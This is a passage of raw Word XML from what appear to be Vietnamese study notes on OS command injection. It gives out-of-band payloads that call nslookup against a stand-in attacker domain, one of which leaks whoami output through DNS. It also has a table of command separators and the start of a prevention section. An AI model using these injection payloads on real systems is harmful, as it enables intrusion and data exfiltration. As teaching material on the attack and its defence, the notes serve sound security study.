          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00732F1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&amp; nslookup kgji2ohoyw.web-attacker.com &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40411214" w14:textId="1B5F53F9" w:rsidR="00732F1E" w:rsidRDefault="00732F1E" w:rsidP="00732F1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33252E9B" w14:textId="4A1BFA68" w:rsidR="00732F1E" w:rsidRDefault="002D7ECB" w:rsidP="00732F1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Lệnh nslookup để thực hiện tra cứu DNS cho 1 miền xác định.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22740D3F" w14:textId="543C1CC2" w:rsidR="002D7ECB" w:rsidRDefault="002D7ECB" w:rsidP="00732F1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Kẻ tấn công có thể theo dõi quá trình tra cứu xảy ra, và phát hiện câu lệnh đã được tiêm thành công hay chưa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21281073" w14:textId="4A3AEC2E" w:rsidR="002D7ECB" w:rsidRDefault="002D7ECB" w:rsidP="00732F1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Những kênh bên ngoài cũng giúp trích xuất kết quả của những câu lệnh được tiêm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51838D48" w14:textId="3ECFE490" w:rsidR="002D7ECB" w:rsidRDefault="002D7ECB" w:rsidP="00732F1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D2B88C3" w14:textId="2A2A69BF" w:rsidR="002D7ECB" w:rsidRDefault="002D7ECB" w:rsidP="002D7ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7ECB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&amp; nslookup `whoami`.kgji2ohoyw.web-attacker.com &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3827941C" w14:textId="6169DA33" w:rsidR="002D7ECB" w:rsidRDefault="002D7ECB" w:rsidP="002D7ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E4C32D" w14:textId="07D066BA" w:rsidR="002D7ECB" w:rsidRDefault="002D7ECB" w:rsidP="002D7ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Điều này sẽ làm cho DNS tra cứu tên miền của kẻ tấn công chứa kết quả của lệnh whoami.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6101A012" w14:textId="1666BCB7" w:rsidR="004508DC" w:rsidRDefault="004508DC" w:rsidP="002D7ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A097453" w14:textId="77777777" w:rsidR="00946899" w:rsidRDefault="00946899" w:rsidP="002D7ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF4F32F" w14:textId="77777777" w:rsidR="00946899" w:rsidRDefault="00946899" w:rsidP="002D7ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291A9DCE" w14:textId="77777777" w:rsidR="00946899" w:rsidRDefault="00946899" w:rsidP="002D7ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="022A696F" w14:textId="77777777" w:rsidR="00946899" w:rsidRDefault="00946899" w:rsidP="002D7ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29FAD3DF" w14:textId="77777777" w:rsidR="00946899" w:rsidRDefault="00946899" w:rsidP="002D7ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68244EE0" w14:textId="77777777" w:rsidR="00946899" w:rsidRDefault="00946899" w:rsidP="002D7ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2766190E" w14:textId="77777777" w:rsidR="00946899" w:rsidRDefault="00946899" w:rsidP="002D7ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1923FA95" w14:textId="77777777" w:rsidR="00946899" w:rsidRDefault="00946899" w:rsidP="002D7ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E627AB7" w14:textId="12DBE66F" w:rsidR="004508DC" w:rsidRDefault="004508DC" w:rsidP="002D7ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004508DC">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Các cách tiêm lệnh OS: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056030AF" w14:textId="56384C44" w:rsidR="004508DC" w:rsidRDefault="004508DC" w:rsidP="002D7ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12D800DD" w14:textId="1450D9D5" w:rsidR="00946899" w:rsidRDefault="004508DC" w:rsidP="002D7ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Có rất nhiều kí tự phân tách lệnh hoạt động trên nhiều hệ điều hành khác nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546FE9FA" w14:textId="646FEB78" w:rsidR="00946899" w:rsidRDefault="00946899" w:rsidP="002D7ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A937A8" w14:textId="77777777" w:rsidR="00946899" w:rsidRDefault="00946899" w:rsidP="002D7ECB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4675"/>
        <w:gridCol w:w="4675"/>
      </w:tblGrid>
      <w:tr w:rsidR="00946899" w14:paraId="79AFA976" w14:textId="77777777" w:rsidTr="00946899">
        <w:trPr>
          <w:trHeight w:val="73"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B8F6CEE" w14:textId="77777777" w:rsidR="00946899" w:rsidRPr="00946899" w:rsidRDefault="00946899" w:rsidP="00946899">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00946899">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Windows và Unix:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C79F836" w14:textId="77777777" w:rsidR="00946899" w:rsidRDefault="00946899" w:rsidP="00946899">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C2BBD1B" w14:textId="77777777" w:rsidR="00946899" w:rsidRPr="00946899" w:rsidRDefault="00946899" w:rsidP="00946899">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00946899">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Unix:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E33F0F5" w14:textId="77777777" w:rsidR="00946899" w:rsidRDefault="00946899" w:rsidP="00946899">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00946899" w14:paraId="1250C04D" w14:textId="77777777" w:rsidTr="00946899">
        <w:trPr>
          <w:trHeight w:val="1404"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="565E75F8" w14:textId="77777777" w:rsidR="00946899" w:rsidRPr="004508DC" w:rsidRDefault="00946899" w:rsidP="00946899">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004508DC">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00E093FF" w14:textId="77777777" w:rsidR="00946899" w:rsidRPr="004508DC" w:rsidRDefault="00946899" w:rsidP="00946899">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004508DC">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&amp;&amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="429A5C80" w14:textId="77777777" w:rsidR="00946899" w:rsidRPr="004508DC" w:rsidRDefault="00946899" w:rsidP="00946899">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004508DC">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36DB838D" w14:textId="77777777" w:rsidR="00946899" w:rsidRPr="004508DC" w:rsidRDefault="00946899" w:rsidP="00946899">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004508DC">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>||</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6305187D" w14:textId="77777777" w:rsidR="00946899" w:rsidRDefault="00946899" w:rsidP="002D7ECB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DD401A7" w14:textId="77777777" w:rsidR="00946899" w:rsidRPr="00946899" w:rsidRDefault="00946899" w:rsidP="00946899">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00946899">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59505303" w14:textId="77777777" w:rsidR="00946899" w:rsidRPr="00946899" w:rsidRDefault="00946899" w:rsidP="00946899">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00946899">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Newline (0x0a hoặc \n)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="798D70C7" w14:textId="77777777" w:rsidR="00946899" w:rsidRPr="002D7ECB" w:rsidRDefault="00946899" w:rsidP="00946899">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="4395"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="558960BB" w14:textId="77777777" w:rsidR="00946899" w:rsidRDefault="00946899" w:rsidP="002D7ECB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77857E07" w14:textId="77777777" w:rsidR="00732F1E" w:rsidRPr="00732F1E" w:rsidRDefault="00732F1E" w:rsidP="00842655">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38C424E2" w14:textId="77777777" w:rsidR="00F80C48" w:rsidRPr="00F80C48" w:rsidRDefault="00F80C48" w:rsidP="00F80C48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03A39AB8" w14:textId="1447D22F" w:rsidR="00F80C48" w:rsidRDefault="00685AA5" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00685AA5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cách ngăn chặn OS command injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2257057B" w14:textId="77777777" w:rsidR="00685AA5" w:rsidRDefault="00685AA5" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15369F1D" w14:textId="5190B5CB" w:rsidR="00685AA5" w:rsidRDefault="00685AA5" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Cách hiệu quả nhất để ngăn chặn lỗ hổng này là không bao giờ gọi các lệnh của hệ điều hành từ ứng dụng.</w:t>
      </w:r>
    </w:p>
